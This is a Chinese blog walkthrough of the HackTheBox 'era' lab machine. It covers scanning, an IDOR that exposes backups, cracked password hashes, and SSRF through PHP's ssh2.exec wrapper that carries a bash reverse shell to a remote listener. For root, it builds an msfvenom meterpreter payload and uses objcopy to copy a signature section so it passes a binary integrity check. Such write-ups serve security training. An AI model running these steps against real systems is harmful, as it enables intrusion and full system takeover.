当前位置: 首页 > news >正文

HTB赛季8靶场 - era

在这里插入图片描述

nmap扫描

└─$ nmap -p- --min-rate 1000 -T4 10.129.137.201 -oA nmapfullscan                                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-27 21:19 EDT
Warning: 10.129.137.201 giving up on port because retransmission cap hit (6).
Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 30.47% done; ETC: 21:21 (0:01:13 remaining)
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 50.06% done; ETC: 21:21 (0:00:58 remaining)
Nmap scan report for 10.129.137.201
Host is up (0.43s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  httpNmap done: 1 IP address (1 host up) scanned in 157.41 seconds

ffuf扫描vhost

ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://era.htb/ -H 'Host: FUZZ.era.htb'

![[Pasted image 20250728101147.png]]

![[Pasted image 20250728101240.png]]

dirsearch扫描页面

dirsearch -u http://file.era.htb/

![[Pasted image 20250728102347.png]]

注册账号并登录
![[Pasted image 20250728102402.png]]

IDOR窃取备份

http://file.era.htb/download.php?id=54&dl=true
http://file.era.htb/download.php?id=150&dl=true

![[Pasted image 20250728102941.png]]

我们爬取sqlite3DB文件
![[Pasted image 20250728141506.png]]

离线破解密码

$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm:america
$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.:mustang

我们用备份数据库里面的内容无法成功登陆,故修改问题答案
![[Pasted image 20250728155554.png]]

SSH2 + SSRF = RCE

登录admin_ef01cab31aa
![[Pasted image 20250728155620.png]]

我们分析源码可知fopen处存在漏洞,只要我们是管理员账户,我们便可以成功控制fopen函数。
![[Pasted image 20250728161833.png]]

![[Pasted image 20250728161933.png]]

那么我们可以尝试使用账号密码来执行一下命令了。

http://file.era.htb/download.php?id=6785&show=true&format=ssh2.exec://eric:america@127.0.0.1:22/bash+-i+>%26+/dev/tcp/10.10.16.3/9001+0>%261;

![[Pasted image 20250728162004.png]]
![[Pasted image 20250728162017.png]]

objcopy sh文件自检绕过

上linpeas.sh搜查
![[Pasted image 20250728163723.png]]

上pspy64监控定时任务
![[Pasted image 20250728164135.png]]

我们且对monitor文件可写,我们生成shell

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=9001 -f elf -o reverse.elf

传输到受害机器,然后我们提取monitor的特征码(因为直接替换貌似不执行monitor,怀疑存在检测)

#提取monitor的特征码
objcopy --dump-section .text_sig=sig monitor#添加monitor的特征码到恶意文件
objcopy --add-section .text_sig=sig reverse.elf

开启msf监听,然后复制bypass后的恶意文件到monitor

cp reverse.elf monitor

最终我们会获取一个shell
![[Pasted image 20250728174208.png]]

http://www.dtcms.com/a/301919.html

相关文章:

  • 可以组成网络的服务器 - 华为OD统一考试(JavaScript 题解)
  • S7-200 SMART 通过本体 RS485 口与 DP01 上传 / 下载程序(网口故障)
  • FastGPT本地构建工作流高级编排(最新4.11.0)
  • Windows 11 下 Anaconda 命令修复指南及常见问题解决
  • Linux应用开发基础知识——LInux学习FreeType编程(七)
  • 【Linux | 网络】传输层(UDP和TCP) - 两万字详细讲解!!
  • 绿算技术携手昇腾发布高性能全闪硬盘缓存设备,推动AI大模型降本增效
  • LeetCode--50.Pow(x,n)
  • MySQL的常用数据类型详解
  • python毕业设计案例:基于python django的抖音数据分析与可视化系统,可视化有echarts,算法包括lstm+朴素贝叶斯算法
  • Java项目:基于SSM框架实现的社区团购管理系统【ssm+B/S架构+源码+数据库+毕业论文+答辩PPT+远程部署】
  • PyTorch入门动态图与神经网络构建
  • PostgreSQL 14.4 ARM64 架构源码编译安装指南
  • 【运维】HuggingFace缓存目录结构详解
  • MySQL SQL性能优化与慢查询分析实战指南:新手DBA成长之路
  • 【第四章:大模型(LLM)】01.神经网络中的 NLP-(2)Seq2Seq 原理及代码解析
  • 数据结构 | 队列:从概念到实战
  • nvim cspell
  • Nginx HTTP 反向代理负载均衡实验
  • NAT地址转换,静态NAT,高级NAT,NAPT,easy IP
  • 【Linux指南】Linux粘滞位详解:解决共享目录文件删除安全隐患
  • GaussDB 开发基本规范
  • XML Expat Parser:深入解析与高效应用
  • Python 列表内存存储本质:存储差异原因与优化建议
  • 第4章唯一ID生成器——4.2 单调递增的唯一ID
  • 【Android】卡片式布局 滚动容器ScrollView
  • Go语法入门:变量、函数与基础数据类型
  • 飞算科技重磅出品:飞算 JavaAI 重构 Java 开发效率新标杆
  • JAVA后端开发——用 Spring Boot 实现定时任务
  • 【Spring】Spring Boot启动过程源码解析